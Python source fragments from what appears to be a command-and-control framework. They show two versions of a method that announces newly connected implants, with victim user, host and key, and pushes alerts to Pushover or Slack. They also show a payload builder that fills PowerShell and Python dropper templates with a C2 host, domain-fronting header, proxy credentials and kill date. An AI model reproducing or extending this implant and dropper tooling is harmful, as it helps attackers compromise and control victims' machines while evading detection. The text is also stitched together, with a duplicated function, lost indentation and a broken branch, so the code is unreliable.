def display(self):
print(Colours.GREEN, "")
it = self.Pivot
if "pbind" in it.lower():
urlInfo = "PBind"
if "fcomm" in it.lower():
urlInfo = "FComm"
else:
urlInfo = get_url_by_id(self.URLID[0])
if urlInfo is not None:
urlInfo = f"URL: {urlInfo[1]}"
else:
urlInfo = "URL: Unknown"
print("[%s] New %s implant connected: (uri=%s key=%s)" % (self.ImplantID, it, self.RandomURI, self.Key))
print("%s | Time:%s | PID:%s | Sleep:%s | %s (%s) | %s" % (self.IPAddress, self.FirstSeen, str(self.PID), str(self.Sleep), (str(self.User) + " @ " + str(self.Hostname)), self.Arch, urlInfo))
EnableNotifications = get_notificationstatus()
try:
Pushover_APIToken = select_item("Pushover_APIToken", "C2Server")
Pushover_APIUser = select_item("Pushover_APIUser", "C2Server")
if EnableNotifications.lower().strip() == "yes" and Pushover_APIToken:
conn = http.client.HTTPSConnection("api.pushover.net:443")
conn.request("POST", "/1/messages.json",
urllib.parse.urlencode({
"token": Pushover_APIToken,
"user": Pushover_APIUser,
"message": "[%s] - NewImplant: %s @ %s" % (NotificationsProjectName, self.User, self.Hostname),
}), {"Content-type": "application/x-www-form-urlencoded"})
output = conn.getresponse()
if output.status != 200:
data = output.read()
print("\nPushover error: ")
print(data)
except Exception as e:
print("Pushover send error: %s" % e)
try:
Slack_BotToken = select_item("Slack_BotToken", "C2Server")
if EnableNotifications.lower().strip() == "yes" and Slack_BotToken:
mention_userid = select_item("Slack_UserID", "C2Server")
channel = select_item("Slack_Channel", "C2Server")
Slack_BotToken = str("Bearer ")+Slack_BotToken
if mention_userid in ("", None):
mention_userid = ""
elif mention_userid.lower().strip() == "channel":
mention_userid = "<!channel> "
else:
mention_userid = "<@%s> " % str(mention_userid)
message = {"channel": channel, "text": "%s[%s] - NewImplant: %s @ %s" % (mention_userid, NotificationsProjectName, self.User, self.Hostname), "as_user": "******", "link_names": "true"}
headers = {"Content-type": "application/json","Authorization": Slack_BotToken }
conn = http.client.HTTPSConnection("slack.com:443")
conn.request("POST", "/api/chat.postMessage",json.dumps(message), headers)
output = conn.getresponse()
if output.status != 200:
data = output.read()
print("Slack error: ")
print(data)
except Exception as e:
print("Slack send error: %s" % e)
def display(self):
print(Colours.GREEN, "")
it = self.Pivot
if "pbind" in it.lower():
urlInfo = "PBind"
else:
urlInfo = get_url_by_id(self.URLID[0])
if urlInfo is not None:
urlInfo = f"URL: {urlInfo[1]}"
else:
urlInfo = "URL: Unknown"
print("[%s] New %s implant connected: (uri=%s key=%s)" %
(self.ImplantID, it, self.RandomURI, self.Key))
print("%s | Time:%s | PID:%s | Sleep:%s | %s (%s) | %s" %
(self.IPAddress, self.FirstSeen, str(self.PID), str(self.Sleep),
(str(self.User) + " @ " + str(self.Hostname)), self.Arch,
urlInfo))
EnableNotifications = get_notificationstatus()
try:
Pushover_APIToken = select_item("Pushover_APIToken", "C2Server")
Pushover_APIUser = select_item("Pushover_APIUser", "C2Server")
if EnableNotifications.lower().strip() == "yes":
conn = http.client.HTTPSConnection("api.pushover.net:443")
conn.request(
"POST", "/1/messages.json",
urllib.parse.urlencode({
"token":
Pushover_APIToken,
"user":
Pushover_APIUser,
"message":
"[%s] - NewImplant: %s @ %s" %
(NotificationsProjectName, self.User, self.Hostname),
}), {"Content-type": "application/x-www-form-urlencoded"})
output = conn.getresponse()
if output.status != 200:
data = output.read()
print("\nPushover error: ")
print(data)
except Exception as e:
print("Pushover send error: %s" % e)
def __init__(self, KillDate, Key, Insecure, UserAgent, Referrer, ConnectURL, BaseDirectory, URLID=None, ImplantType="", PowerShellProxyCommand="", PBindPipeName=DefaultPBindPipeName, PBindSecret=DefaultPBindSecret):
if not URLID:
URLID = get_default_url_id()
self.URLID = URLID
urlDetails = get_url_by_id(self.URLID)
self.KillDate = KillDate
self.Key = Key
self.QuickCommand = select_item("QuickCommand", "C2Server")
self.FirstURL = get_first_url(select_item("PayloadCommsHost", "C2Server"), select_item("DomainFrontHeader", "C2Server"))
self.PayloadCommsHost = urlDetails[2]
self.DomainFrontHeader = urlDetails[3]
self.Proxyurl = urlDetails[4]
self.Proxyuser = urlDetails[5]
self.Proxypass = urlDetails[6]
self.PowerShellProxyCommand = PowerShellProxyCommand
self.ImplantType = ImplantType
self.Insecure = Insecure
self.UserAgent = UserAgent
self.Referrer = Referrer
self.ConnectURL = ConnectURL
self.BaseDirectory = BaseDirectory
self.PBindPipeName = PBindPipeName if PBindPipeName else DefaultPBindPipeName
self.PBindSecret = PBindSecret if PBindSecret else DefaultPBindSecret
self.BaseDirectory = BaseDirectory
self.PSDropper = ""
self.PyDropper = ""
if os.path.exists("%saes.py" % PayloadsDirectory):
with open("%saes.py" % PayloadsDirectory, 'r') as f:
content = f.read()
m = re.search('#KEY(.+?)#KEY', content)
if m:
keyfound = m.group(1)
self.PyDropperHash = hashlib.sha512(content.encode("utf-8")).hexdigest()
self.PyDropperKey = keyfound
else:
self.PyDropperKey = str(gen_key().decode("utf-8"))
randomkey = self.PyDropperKey
with open("%saes.py" % PayloadTemplatesDirectory, 'r') as f:
content = f.read()
aespy = str(content).replace("#REPLACEKEY#", "#KEY%s#KEY" % randomkey)
filename = "%saes.py" % (self.BaseDirectory)
with open(filename, 'w') as f:
f.write(aespy)
self.PyDropperHash = hashlib.sha512((aespy).encode('utf-8')).hexdigest()
with open("%sdropper.ps1" % PayloadTemplatesDirectory, 'r') as f:
content = f.read()
self.PSDropper = str(content) \
.replace("#REPLACEINSECURE#", self.Insecure) \
.replace("#REPLACEHOSTPORT#", self.PayloadCommsHost) \
.replace("#REPLACECONNECTURL#", (self.ConnectURL + self.ImplantType)) \
.replace("#REPLACEIMPTYPE#", self.PayloadCommsHost) \
.replace("#REPLACEKILLDATE#", self.KillDate) \
.replace("#REPLACEPROXYUSER#", self.Proxyuser) \
.replace("#REPLACEPROXYPASS#", self.Proxypass) \
.replace("#REPLACEPROXYURL#", self.Proxyurl) \
.replace("#REPLACEPROXYCOMMAND#", self.PowerShellProxyCommand) \
.replace("#REPLACEDOMAINFRONT#", self.DomainFrontHeader) \
.replace("#REPLACECONNECT#", self.ConnectURL) \
.replace("#REPLACEUSERAGENT#", self.UserAgent) \
.replace("#REPLACEREFERER#", self.Referrer) \
.replace("#REPLACEURLID#", str(self.URLID)) \
.replace("#REPLACEKEY#", self.Key)